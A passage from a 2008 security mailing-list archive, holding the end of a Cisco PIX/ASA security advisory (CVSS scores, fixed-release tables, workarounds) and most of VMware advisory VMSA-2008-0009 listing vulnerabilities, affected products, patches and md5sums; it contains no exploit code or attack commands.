control-plane ACL may not work after it is initially configured on the device. The following example uses the show running-config | include control-plane command to determine if a control-plane ACL is configured on the device: ASA# show running-config | include control-plane access-group 101 in interface inside control-plane ASA# This vulnerability is documented in Cisco Bug ID CSCsm67466 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-2059. Vulnerability Scoring Details ============================= Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss CSCsm84110 - Crafted TCP ACK Packet Vulnerability CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCsm26841 - Crafted TLS Packet Vulnerability CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCso22981 - Instant Messenger Inspection Vulnerability CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCsj60659 - Vulnerability Scan Denial of Service CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed CSCsm67466 - Control-plane Access Control List Vulnerability CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - None Availability Impact - None CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of the first four vulnerabilities may cause a reload of the affected device. Repeated exploitation could result in a sustained Denial-of-Service (DoS) condition. Successful exploitation of the fifth vulnerability may allow an attacker to bypass control-plane ACLs and successfully send malicious traffic to the device. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. The following list contains the first fixed software release of each vulnerability: +---------------------------------------+ | | Affected | First | | Vulnerability | Release | Fixed | | | | Release | |---------------+----------+------------| | | 7.0 | Not | | | | vulnerable | | |----------+------------| | | 7.1 | 7.1(2)70 | |Crafted TCP |----------+------------| | ACK Packet | 7.2 | 7.2(4) | |Vulnerability |----------+------------| | | 8.0 | 8.0(3)10 | | |----------+------------| | | 8.1 | Not | | | | vulnerable | |---------------+----------+------------| | | 7.0 | Not | | | | vulnerable | | |----------+------------| | | 7.1 | Not | | Crafted TLS | | vulnerable | |Packet |----------+------------| | Vulnerability | 7.2 | Not | | | | vulnerable | | |----------+------------| | | 8.0 | 8.0(3)9 | | |----------+------------| | | 8.1 | 8.1(1)1 | |---------------+----------+------------| | | 7.0 | Not | | | | vulnerable | | |----------+------------| | Instant | 7.1 | Not | | Messenger | | vulnerable | |Inspection |----------+------------| | Vulnerability | 7.2 | 7.2(4) | | |----------+------------| | | 8.0 | 8.0(3)10 | | |----------+------------| | | 8.1 | 8.1(1)2 | |---------------+----------+------------| | | 7.0 | Not | | | | vulnerable | | |----------+------------| | | 7.1 | Not | | Vulnerability | | vulnerable | |Scan Denial |----------+------------| | of Service | 7.2 | 7.2(3)2 | | |----------+------------| | | 8.0 | 8.0(2)17 | | |----------+------------| | | 8.1 | Not | | | | vulnerable | |---------------+----------+------------| | | 7.0 | Not | | | | vulnerable | | |----------+------------| | | 7.1 | Not | | Control-plane | | vulnerable | |Access |----------+------------| | Control List | 7.2 | Not | | Vulnerability | | vulnerable | | |----------+------------| | | 8.0 | 8.0(3)9 | | |----------+------------| | | 8.1 | Not | | | | vulnerable | +---------------------------------------+ Fixed PIX software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/pix?psrtdcat20e2 Fix ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/asa?psrtdcat20e2 Workarounds =========== This Security Advisory describes multiple distinct vulnerabilities. These vulnerabilities and their respective workarounds are independent of each other. Crafted TCP ACK Packet Vulnerability +----------------------------------- As a workaround and best practice allow Telnet, SSH, and ASDM connections from only trusted hosts in your network. Additionally, filters that deny TCP ports 22, 23, 80, and 443 packets may be deployed throughout the network as part of a transit ACL (tACL) policy for protection of traffic which enters the network at ingress access points. This policy should be configured to protect the network device where the filter is applied and other devices behind it. Filters for packets using TCP ports 22, 23, 80, and 443 should also be deployed in front of vulnerable network devices so that traffic is only allowed from trusted clients. Additional information about tACLs is available in "Transit Access Control Lists : Filtering at Your Edge": http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml Crafted TLS Packet Vulnerability +------------------------------- There are no workarounds for this vulnerability. Instant Messenger Inspection Vulnerability The only workaround for this vulnerability is to disable IM inspection on the security appliance. Port Scan Denial of Service Vulnerability +---------------------------------------- There are no workarounds for this vulnerability. Control-plane Access Control List Vulnerability +---------------------------------------------- There are no workarounds for this vulnerability. Additional mitigation techniques that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory: http://www.cisco.com/warp/public/707/cisco-amb-20080604-asa.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt at cisco.com or security-alert at cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac at cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory. These vulnerabilities were found during internal testing and during the troubleshooting of a technical support service request. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce at cisco.com * first-teams at first.org * bugtraq at securityfocus.com * vulnwatch at vulnwatch.org * cisco at spot.colorado.edu * cisco-nsp at puck.nether.net * full-disclosure at lists.grok.org.uk * comp.dcom.sys.cisco at newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +---------------------------------------+ | Revision | | Initial | | 1.0 | 2008-June-04 | public | | | | release | +---------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) iEYEARECAAYFAkhGwG8ACgkQ86n/Gc8U/uAXugCgl3ldbkYO1vTiMqcWSf7NPfNO oQgAn2DiTO9kCOY0anGos0sdjHU0jAai =30Rf -----END PGP SIGNATURE----- From security at vmware.com Wed Jun 4 18:13:35 2008 From: security at vmware.com (VMware Security team) Date: Wed, 04 Jun 2008 10:13:35 -0700 Subject: [Full-disclosure] VMSA-2008-0009 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues Message-ID: <4846CD3F.1040406@vmware.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 - ------------------------------------------------------------------- VMware Security Advisory Advisory ID: VMSA-2008-0009 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion, VMware Server, VMware VIX API, VMware ESX, VMware ESXi resolve critical security issues Issue date: 2008-06-04 Updated on: 2008-06-04 (initial release of advisory) CVE numbers: CVE-2007-5671 CVE-2008-0967 CVE-2008-2097 CVE-2008-2100 CVE-2006-1721 CVE-2008-0553 CVE-2007-5378 CVE-2007-4772 CVE-2008-0888 CVE-2008-0062 CVE-2008-0063 CVE-2008-0948 - ------------------------------------------------------------------- 1. Summary: Several critical security vulnerabilities have been addressed in patches in ESX and in the newest releases of VMware's hosted product line. 2. Relevant releases: VMware Workstation 6.0.3 and earlier, VMware Workstation 5.5.6 and earlier, VMware Player 2.0.3 and earlier, VMware Player 1.0.6 and earlier, VMware ACE 2.0.3 and earlier, VMware ACE 1.0.5 and earlier, VMware Server 1.0.5 and earlier, VMware Fusion 1.1.1 and earlier VMware ESXi 3.5 without patches ESXe350-200805501-I-SG, ESXe350-200805502-T-SG, ESXe350-200805503-C-SG VMware ESX 3.5 without patches ESX350-200805515-SG, ESX350-200805508-SG, ESX350-200805501-BG, ESX350-200805504-SG, ESX350-200805506-SG, ESX350-200805505-SG, ESX350-200805507-SG VMware ESX 3.0.2 without patches ESX-1004727, ESX-1004821, ESX-1004216, ESX-1004726, ESX-1004722, ESX-1004724, ESX-1004719, ESX-1004219 VMware ESX 3.0.1 without patches ESX-1004186, ESX-1004728, ESX-1004725, ESX-1004721, ESX-1004723, ESX-1004190, ESX-1004189 VMware ESX 2.5.5 without update patch 8 VMware ESX 2.5.4 without update patch 19 NOTES: Hosted products VMware Workstation 5.x, VMware Player 1.x, and VMware ACE 1.x will reach end of general support 2008-11-09. Customers should plan to upgrade to the latest version of their respective products. ESX 3.0.1 is in Extended Support and its end of extended support (Security and Bug fixes) is 2008-07-31. Users should plan to upgrade to at least 3.0.2 update 1 and preferably the newest release available before the end of extended support. ESX 2.5.4 is in Extended Support and its end of extended support (Security and Bug fixes) is 2008-10-08. Users should plan to upgrade to at least 2.5.5 and preferably the newest release available before the end of extended support. 3. Problem description: a. VMware Tools Local Privilege Escalation on Windows-based guest OS The VMware Tools Package provides support required for shared folders (HGFS) and other features. An input validation error is present in the Windows-based VMware HGFS.sys driver. Exploitation of this flaw might result in arbitrary code execution on the guest system by an unprivileged guest user. It doesn't matter on what host the Windows guest OS is running, as this is a guest driver vulnerability and not a vulnerability on the host. The HGFS.sys driver is present in the guest operating system if the VMware Tools package is loaded. Even if the host has HGFS disabled and has no shared folders, Windows-based guests may be affected. This is regardless if a host supports HGFS. This issue could be mitigated by removing the VMware Tools package from Windows based guests. However this is not recommended as it would impact usability of the product. NOTE: Installing the new hosted release or ESX patches will not remediate the issue. The VMware Tools packages will need to be updated on each Windows-based guest followed by a reboot of the guest system. VMware would like to thank iDefense and Stephen Fewer of Harmony Security for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-5671 to this issue. VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= Workstation 6.x Windows not affected Workstation 6.x Linux not affected Workstation 5.x Windows 5.5.6 build 80404 or later Workstation 5.x Linux 5.5.6 build 80404 or later Player 2.x Windows not affected Player 2.x Linux not affected Player 1.x Windows 1.0.6 build 80404 or later Player 1.x Linux 1.0.6 build 80404 or later ACE 2.x Windows not affected ACE 1.x Windows 1.0.5 build 79846 or later Server 1.x Windows 1.0.5 build 80187 or later Server 1.x Linux 1.0.5 build 80187 or later Fusion 1.x Mac OS/X not affected ESXi 3.5 ESXi not affected ESX 3.5 ESX not affected ESX 3.0.2 ESX ESX-1004727 ESX 3.0.1 ESX ESX-1004186 ESX 2.5.5 ESX ESX 2.5.5 upgrade patch 5 or later ESX 2.5.4 ESX ESX 2.5.4 upgrade patch 16 or later b. Privilege escalation on ESX or Linux based hosted operating systems This update fixes a security issue related to local exploitation of an untrusted library path vulnerability in vmware-authd. In order to exploit this vulnerability, an attacker must have local access and the ability to execute the set-uid vmware-authd binary on an affected system. Exploitation of this flaw might result in arbitrary code execution on the Linux host system by an unprivileged user. VMware would like to thank iDefense for reporting this issue to us. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-0967 to this issue. VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= Workstation 6.x Windows not affected Workstation 6.x Linux 6.0.4 build 93057 Workstation 5.x Windows not affected Workstation 5.x Linux 5.5.7 build 91707 Player 2.x Windows not affected Player 2.x Linux 2.0.4 build 93057 Player 1.x Windows not affected Player 1.x Linux 1.0.7 build 91707 ACE 2.x Windows not affected ACE 1.x Windows not affected Server 1.x Windows not affected Server 1.x Linux 1.0.6 build 91891 Fusion 1.x Mac OS/X not affected ESXi 3.5 ESXi ESXe350-200805501-I-SG ESX 3.5 ESX ESX350-200805515-SG ESX 3.0.2 ESX ESX-1004821 ESX 3.0.1 ESX ESX-1004728 ESX 2.5.5 ESX ESX 2.5.5 update patch 8 ESX 2.5.4 ESX ESX 2.5.4 update patch 19 c. Openwsman Invalid Content-Length Vulnerability Openwsman is a system management platform that implements the Web Services Management protocol (WS-Management). It is installed and running by default. It is used in the VMware Management Service Console and in ESXi. The openwsman management service on ESX 3.5 and ESXi 3.5 is vulnerable to a privilege escalation vulnerability, which may allow users with non-privileged ESX or Virtual Center accounts to gain root privileges. To exploit this vulnerability, an attacker would need a local ESX account or a VirtualCenter account with the Host.Cim.CimInteraction permission. Systems with no local ESX accounts and no VirtualCenter accounts with the Host.Cim.CimInteraction permission are not vulnerable. This vulnerability cannot be exploited by users without valid login credentials. Discovery: Alexander Sotirov, VMware Security Research The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-2097 to this issue. VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= hosted any any not affected ESXi 3.5 ESXi ESXe350-200805501-I-SG ESX 3.5 ESX ESX350-200805508-SG ESX 3.0.2 ESX not affected ESX 3.0.1 ESX not affected ESX 2.5.5 ESX not affected ESX 2.5.4 ESX not affected NOTE: VMware hosted products are not affected by this issue. d. VMware VIX Application Programming Interface (API) Memory Overflow Vulnerabilities The VIX API (also known as "Vix") is an API that lets users write scripts and programs to manipulate virtual machines. Multiple buffer overflow vulnerabilities are present in the VIX API. Exploitation of these vulnerabilities might result in code execution on the host system or on the service console in ESX Server from the guest operating system. The VIX API can be enabled and disabled using the "vix.inGuest.enable" setting in the VMware configuration file. This default value for this setting is "disabled". This configuration setting is present in the following products: VMware Workstation 6.0.2 and higher VMware ACE 6.0.2 and higher VMware Server 1.06 and higher VMware Fusion 1.1.2 and higher ESX Server 3.0 and higher ESX Server 3.5 and higher In previous versions of VMware products where the VIX API was introduced, the VIX API couldn't be disabled. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-2100 to this issue. VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= VIX API 1.1.x Windows VMware-vix-1.1.4-93057.exe VIX API 1.1.x Linux VMware-vix-1.1.4-93057.i386.tar.gz VIX API 1.1.x Linux64 VMware-vix-1.1.4-93057.x86_64.tar.gz Workstation 6.x Windows 6.0.4 build 93057 Workstation 6.x Linux 6.0.4 build 93057 Workstation 5.x Windows 5.5.7 build 91707 Workstation 5.x Linux 5.5.7 build 91707 Player 2.x Windows 2.0.4 build 93057 Player 2.x Linux 2.0.4 build 93057 Player 1.x Windows 1.0.6 build 91707 Player 1.x Linux 1.0.6 build 91707 ACE 2.x Windows 2.0.4 build 93057 ACE 1.x Windows not affected Server 1.x Windows 1.0.6 build 91891 Server 1.x Linux 1.0.6 build 91891 Fusion 1.x Mac OS/X 1.1.2 build 87978 or later ESXi 3.5 ESXi ESXe350-200805501-I-SG, ESXe350-200805502-T-SG ESX 3.5 ESX ESX350-200805501-BG ESX 3.0.2 ESX ESX-1004216, ESX-1004726, ESX-1004727 ESX 3.0.1 ESX ESX-1004186, ESX-1004725 ESX 2.5.5 ESX not affected ESX 2.5.4 ESX not affected II Service Console rpm updates NOTE: ESXi and hosted products are not affected by any service console security updates a. Security update for cyrus-sasl Updated cyrus-sasl package for the ESX Service Console corrects a security issue found in the DIGEST-MD5 authentication mechanism of Cyrus' implementation of Simple Authentication and Security Layer (SASL). As a result of this issue in the authentication mechanism, a remote unauthenticated attacker might be able to cause a denial of service error on the service console. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2006-1721 to this issue. RPMs Updated: cyrus-sasl-2.1.15-15.i386.rpm cyrus-sasl-md5-2.1.15-1.i386.rpm VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= hosted any any not affected ESXi 3.5 ESXi not affected ESX 3.5 ESX ESX350-200805504-SG ESX 3.0.2 ESX ESX-1004722 ESX 3.0.1 ESX ESX-1004721 ESX 2.5.5 ESX not affected ESX 2.5.4 ESX not affected b. Security update for tcltk An input validation flaw was discovered in Tk's GIF image handling. A code-size value read from a GIF image was not properly validated before being used, leading to a buffer overflow. A specially crafted GIF file could use this to cause a crash or, potentially, execute code with the privileges of the application using the Tk graphical toolkit. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-0553 to this issue. A buffer overflow flaw was discovered in Tk's animated GIF image handling. An animated GIF containing an initial image smaller than subsequent images could cause a crash or, potentially, execute code with the privileges of the application using the Tk library. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-5378 to this issue. A flaw first discovered in the Tcl regular expression engine used in the PostgreSQL database server, resulted in an infinite loop when processing certain regular expressions. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-4772 to this issue. RPM Updated: tcl-8.3.5-92.8.i386.rpm VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= hosted any any not affected ESXi 3.5 ESXi not affected ESX 3.5 ESX ESX350-200805506-SG ESX 3.0.2 ESX ESX-1004724 ESX 3.0.1 ESX ESX-1004723 ESX 2.5.5 ESX ESX 2.5.5 Upgrade Patch 8 ESX 2.5.4 ESX ESX 2.5.4 Upgrade Patch 19 c. Security update for unzip This patch includes a moderate security update to the service console that fixes a flaw in unzip. An attacker could execute malicious code with a user's privileges if the user ran unzip on a file designed to leverage this flaw. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-0888 to this issue. RPM Updated: Unzip-5.50-36.EL3.i386.rpm VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= hosted any any not affected ESXi 3.5 ESXi not affected ESX 3.5 ESX ESX350-200805505-SG ESX 3.0.2 ESX ESX-1004719 ESX 3.0.1 ESX ESX-1004190 ESX 2.5.5 ESX ESX 2.5.5 Upgrade Patch 8 ESX 2.5.4 ESX ESX 2.5.4 Upgrade Patch 19 d. Security update for krb5 KDC in MIT Kerberos 5 (krb5kdc) does not set a global variable for some krb4 message types, which allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via crafted messages that trigger a NULL pointer dereference or double-free. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-0062 to this issue. NOTE: ESX doesn't contain the krb5kdc binary and is not vulnerable to this issue. The Kerberos 4 support in KDC in MIT Kerberos 5 (krb5kdc) does not properly clear the unused portion of a buffer when generating an error message, which might allow remote attackers to obtain sensitive information, aka "Uninitialized stack values." The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-0063 to this issue. NOTE: ESX doesn't contain the krb5kdc binary and is not vulnerable to this issue. Buffer overflow in the RPC library (lib/rpc/rpc_dtablesize.c) used by libgssrpc and kadmind in MIT Kerberos 5 (krb5) 1.2.2, and probably other versions before 1.3, when running on systems whose unistd.h does not define the FD_SETSIZE macro, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by triggering a large number of open file descriptors. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2008-0948 to this issue. RPM Updated: krb5-libs-1.2.7-68.i386.rpm VMware Product Running Replace with/ Product Version on Apply Patch ============ ======== ======= ================= hosted any any not affected ESXi 3.5 ESXi not affected ESX 3.5 ESX ESX350-200805507-SG ESX 3.0.2 ESX ESX-1004219 ESX 3.0.1 ESX ESX-1004189 ESX 2.5.5 ESX ESX 2.5.5 Upgrade Patch 8 ESX 2.5.4 ESX ESX 2.5.4 Upgrade Patch 19 4. Solution: Please review the release notes for your product and version and verify the md5sum of your downloaded file. VMware Workstation 6.0.4 ------------------------ http://www.vmware.com/download/ws/ Release notes: http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html Windows binary md5sum: f50a05831e94c19d98f363c752fca5f9 RPM Installation file for 32-bit Linux md5sum: e7793b14b995d3b505f093c84e849421 tar Installation file for 32-bit Linux md5sum: a0a8e1d8188f4be03357872a57a767ab RPM Installation file for 64-bit Linux md5sum: 960d753038a268b8f101f4b853c0257e tar Installation file for 64-bit Linux md5sum: 4697ec8a9d6c1152d785f3b77db9d539 VMware Workstation 5.5.7 ------------------------ http://www.vmware.com/download/ws/ws5.html Release notes: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html Windows binary: md5sum: 4c6a6653b7296240197aac048591c659 Compressed Tar archive for 32-bit Linux md5sum: 8fc15d72031489cf5cd5d47b966787e6 Linux RPM version for 32-bit Linux md5sum: f0872fe447ac654a583af16b2f4bba3f VMware Player 2.0.4 and 1.0.7 ----------------------------- http://www.vmware.com/download/player/ Release notes Player 1.x: http://www.vmware.com/support/player/doc/releasenotes_player.html Release notes Player 2.0 http://www.vmware.com/support/player2/doc/releasenotes_player2.html 2.0.4 Windows binary md5sum: a117664a8bfa7336b846117e5fc048dd VMware Player 2.0.4 for Linux (.rpm) md5sum: de6ab6364a0966b68eadda2003561cd2 VMware Player 2.0.4 for Linux (.tar) md5sum: 9e1c2bfda6b22a3fc195a86aec11903a VMware Player 2.0.4 - 64-bit (.rpm) md5sum: 997e5ceffe72f9ce9146071144dacafa VMware Player 2.0.4 - 64-bit (.tar) md5sum: 18eb4ee49dd7e33ec155ef69d7d259ef 1.0.7 Windows binary md5sum: 51114b3b433dc1b3bf3e434aebbf2b9c Player 1.0.7 for Linux (.rpm) md5sum: 3b5f97a37df3b984297fa595a5cdba9c Player 1.0.7 for Linux (.tar) md5sum: b755739144944071492a16fa20f86a51 VMware ACE ---------- http://www.vmware.com/download/ace/ Release notes 2.0: http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html VMware-workstation-6.0.4-93057.exe md5sum: f50a05831e94c19d98f363c752fca5f9 VMware-ACE-Management-Server-Appliance-2.0.4-93057.zip md5sum: d2ae2246f3d87268cf84c1421d94e86c VMware-ACE-Management-Server-2.0.4-93057.exe md5sum: 41b31b3392d5da2cef77a7bb28654dbf VMware-ACE-Management-Server-2.0.4-93057.i386-rhel4.rpm md5sum: 9920be4c33773df53a1728b41af4b109 VMware-ACE-Management-Server-2.0.4-93057.i386-sles9.rpm md5sum: 4ec4c37203db863e8844460b5e80920b Release notes 1.x: http://www.vmware.com/support/ace/doc/releasenotes_ace.html VMware-ACE-1.0.6-89199.exe md5sum: 110f6e24842a0d154d9ec55ef9225f4f VMware Server 1.0.6 ------------------- http://www.vmware.com/download/server/ Release notes: http://www.vmware.com/support/server/doc/releasenotes_server.html VMware Server for Windows 32-bit and 64-bit md5sum: 3e00d5cfae123d875e4298bddabf12f5 VMware Server Windows client package md5sum: 64f3fc1b4520626ae465237d7ec4773e VMware Server for Linux md5sum: 46ea876bfb018edb6602a921f6597245 VMware Server for Linux rpm md5sum: 9d2f0af908aba443ef80bec8f7ef3485 Management Interface md5sum: 1b3daabbbb49a036fe49f53f812ef64b VMware Server Linux client package md5sum: 185e5b174659f366fcb38b1c4ad8d3c6 VMware Fusion 1.1.3 -------------- http://www.vmware.com/download/fusion/ Release notes: http://www.vmware.com/support/fusion/doc/releasenotes_fusion.html md5sum: D15A3DFD3E7B11FC37AC684586086D VMware VIX 1.1.4 ---------------- http://www.vmware.com/support/developer/vix-api/ Release notes: http://www.vmware.com/support/pubs/vix-api/VIXAPI-1.1.4-Release-Notes.html VMware-vix-1.1.4-93057.exe md5sum: 2efb74618c7ead627ecb3b3033e3f9f6 VMware-vix-1.1.4-93057.i386.tar.gz md5sum: 988df2b2bbc975a6fc11f27ad1519832 VMware-vix-1.1.4-93057.x86_64.tar.gz md5sum: a64f951c6fb5b2795a29a5a7607059c0 ESXi ---- VMware ESXi 3.5 patch ESXe350-200805501-O-SG (authd, openwsman, VIX) http://download3.vmware.com/software/esx/ESXe350-200805501-O-SG.zip md5sum: 4ce06985d520e94243db1e0504a56d8c http://kb.vmware.com/kb/1005073 http://kb.vmware.com/kb/1004173 http://kb.vmware.com/kb/1004172 NOTE: ESXe350-200805501-O-SG contains the following patch bundles: ESXe350-200805501-I-SG, ESXe350-200805502-T-SG, ESXe350-200805503-C-SG ESX --- VMware ESX 3.5 patch ESX350-200805515-SG (authd) http://download3.vmware.com/software/esx/ESX350-200805515-SG.zip md5sum: 324b50ade230bcd5079a76e3636163c5 http://kb.vmware.com/kb/1004170 VMware ESX 3.5 patch ESX350-200805508-SG (openwsman) http://download3.vmware.com/software/esx/ESX350-200805508-SG.zip md5sum: 3ff8c06d4a9dd406f64f89c51bf26d12 http://kb.vmware.com/kb/1004644 VMware ESX 3.5 patch ESX350-200805501-BG (VIX) http://download3.vmware.com/software/esx/ESX350-200805501-BG.zip md5sum: 31a620aa249c593c30015b5b6f8c8650 http://kb.vmware.com/kb/1004637 VMware ESX 3.5 patch ESX350-200805504-SG (cyrus-sasl) http://download3.vmware.com/software/esx/ESX350-200805504-SG.zip md5sum: 4c1b1a8dcb09a636b55c64c290f7de51 http://kb.vmware.com/kb/1004640 VMware ESX 3.5 patch ESX350-200805506-SG (tcltk) http://download3.vmware.com/software/esx/ESX350-200805506-SG.zip md5sum: af279eef8fdeddb7808630da1ae717b1 http://kb.vmware.com/kb/1004642 VMware ESX 3.5 patch ESX350-200805505-SG (unzip) http://download3.vmware.com/software/esx/ESX350-200805505-SG.zip md5sum: 07af82d9fd97cccb89d9b90c6ecc41c6 http://kb.vmware.com/kb/1004641 VMware ESX 3.5 patch ESX350-200805507-SG (krb5) http://download3.vmware.com/software/esx/ESX350-200805507-SG.zip md5sum: 5d35a1c470daf13c9f4df5bdc9438748 http://kb.vmware.com/kb/1004643 VMware ESX 3.0.2 patch ESX-1004727 (HGFS,VIX) http://download3.vmware.com/software/vi/ESX-1004727.tgz md5sum: 31a67b0fa3449747887945f8d370f19e http://kb.vmware.com/kb/1004727 VMware ESX 3.0.2 patch ESX-1004821 (authd) http://download3.vmware.com/software/vi/ESX-1004821.tgz md5sum: 5c147bedd07245c903d44257522aeba1 http://kb.vmware.com/kb/1004821 VMware ESX 3.0.2 patch ESX-1004216 (VIX) http://download3.vmware.com/software/vi/ESX-1004216.tgz md5sum: 0784ef70420d28a9a5d6113769f6669a http://kb.vmware.com/kb/1004216 VMware ESX 3.0.2 patch ESX-1004726 (VIX) http://download3.vmware.com/software/vi/ESX-1004726.tgz md5sum: 44f03b274867b534cd274ccdf4630b86 http://kb.vmware.com/kb/1004726 VMware ESX 3.0.2 patch ESX-1004722 (cyrus-sasl) http://download3.vmware.com/software/vi/ESX-1004722.tgz md5sum: 99dc71aed5bab7711f573b6d322123d6 